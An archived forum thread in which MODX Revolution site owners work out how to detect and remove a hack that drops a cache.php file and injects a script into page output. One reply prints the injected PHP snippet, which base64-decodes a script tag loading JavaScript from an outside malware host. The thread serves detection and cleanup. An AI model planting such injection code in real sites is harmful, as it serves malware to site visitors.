We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
MODX Community Forums Archive

Modx Revolution 2.2.6 hack appearing in assets folder

  • Jay Gilmore Reply #21, 9 years, 10 months ago
    franklinveaux, I am not 100% sure either but does have shared symptoms regardless of user creation or not. Was your site ever on a previous version of MODX—especially in the last 4 months?
      Author of zero books. Formerly of many strange things. Pairs well with meats. Conversations are magical experiences. He's dangerous around code but a markup magician. BlogTwitterLinkedInGitHub
      • 38357
      • 178 Posts
      bobd72 Reply #22, 9 years, 10 months ago
      I am having the same problem 2.2.14pl - at least I know it's not just me. Has anyone found any files other than cache.php which can be removed? My problem seems to have appeared since the hosting company moved my site to a new server.
      • sottwell Reply #23, 9 years, 10 months ago
        Check for users you didn't create. Manually empty the core/cache/ directory. Look for files with unusual creation or modification dates, and check them for strange, uncommented and out-of-place base64_decode() functions, like the one described above, or if you have a command line or tool for searching multiple files, search for at least part of that encoded string.
        if ($_SERVER["HTTP_REFERER"]!='') {
                $linker = base64_decode("PG5vaW5kZXg+CjxzY3JpcHQgc3JjPSIvL3N0YXQucm9sbGVkd2lsLmJpei9zdGF0LnBocD88cmVwbGFjZT4iPjwvc2NyaXB0Pgo8L25vaW5kZXg+");
                $param = str_replace('.','',$_SERVER['SERVER_ADDR']);
                $linker = str_replace('<replace>', $param, $linker );
                $this->modx->resource->_output = str_replace("</body>", $linker."\n</body>", $this->modx->resource->_output); }

        If you take that coded string and run it through an online decoder, like http://www.base64decode.org/, it does decode into that javascript link:
        <noindex>
<script src="//stat.rolledwil.biz/stat.php?<replace>"></script>
</noindex>


        Example command for searching for this via the command line:
        grep -H -r "base64_decode("PG5vaW5kZXg" /home/myuser/public_html



          Studying MODX in the desert - http://sottwell.com
          Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
          Join the Slack Community - http://modx.org
          • 38357
          • 178 Posts
          bobd72 Reply #24, 9 years, 10 months ago
          Thanks Susan and all,
          I have found the files and code and removed where necessary which has stopped the popup appearing on Android phones. I note that the offending files on the server were both dated the same day that I upgraded to 2.2.14 but the original files uploaded from the .zip file are clean. It would appear that the infection may have occurred on that day or else the files were changed without affecting the date stamp on the files.
          I will continue to monitor to see if reinfection occurs.
          There are no unusual users registered on the site as all new users are moderated carefully.
            • 10075
            • 20 Posts
            franklinveaux Reply #25, 9 years, 10 months ago
            I believe this attack does in fact represent a zero-day exploit of 2.2.14. I've seen it on sites running 2.2.14, and when I deleted the malicious cache.php from my install and reloaded from a clean copy of 2.2.14, the attack recurred within 24 hours.
              • 10075
              • 20 Posts
              franklinveaux Reply #26, 9 years, 10 months ago
              Additional information:

              The malicious Javascript at stat.rolledwil.biz/stat.php checks both the referrer header and the browser user agent when it decides what action to take. It will serve up the malicious script only if the referrer matches the encoded IP address in the URL and the browser user agent is an Android browser.

              The server at stat.rolledwil.biz is behind the Cloudflare content delivery network. I've dealt with Cloudflare in the past; they have a hopelessly dysfunctional internal abuse procedure (I've seen phish sites they're distributing remain active for more than 60 days after they've been notified they're serving a phish). I've notified Cloudflare they're serving a malicious Javascript that leads to malware, but I frankly do not expect them to take any action.
                • 3749
                • 24,544 Posts
                BobRay Reply #27, 9 years, 10 months ago
                Indeed:

                https://wordtothewise.com/2012/07/cloudflare-and-spamhaus/

                http://bluetack.co.uk/forums/index.php?showtopic=20449

                In addition, Cloudflare makes it hard to block miscreants by sending their own IP number rather than the real one.
                  Did I help you? Buy me a beer
                  Get my Book: MODX:The Official Guide
                  MODX info for everyone: http://bobsguides.com/modx.html
                  My MODX Extras
                  Bob's Guides is now hosted at A2 MODX Hosting
                  • 38357
                  • 178 Posts
                  bobd72 Reply #28, 9 years, 10 months ago
                  I have checked my site and indeed the cache.php file has appeared again overnight, which I have removed again. However it had not yet inserted the code into /core/model/modx/modresponse.class.php at line 188 and my android phone is not giving me a message when I access the site. core/cache had a heap of references to cache.php I will monitor it and see if I can track what triggers that code insertion.

                  However, how to find what causes the file to appear, where it comes from, and how to stop it?
                  • sottwell Reply #29, 9 years, 10 months ago
                    Change all of your passwords, and usernames where possible. CPanel, FTP, MODX Manager, everything. You can also set the permissions on the index.php, config.inc.php, and any other core .php files to read-only.
                      Studying MODX in the desert - http://sottwell.com
                      Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
                      Join the Slack Community - http://modx.org
                      • 13373
                      • 70 Posts
                      jacobkball Reply #30, 9 years, 10 months ago
                      I'm glad I came across this thread, as I've just been updating a new client's 2.2.4 installation (yes, I know it needs updating!!). I'm mentioning the version, to show how far back the vulnerability goes - I'm assuming it's MODX related, although I haven't come across it yet on any MODX installs on my own ded server.

                      I found it had added the cache file, modified the response file, and there was also an unknown user.

                      Thanks so much for the instructions on how to remove it. I found it was affecting the load time of jquery and breaking things like image lightboxes.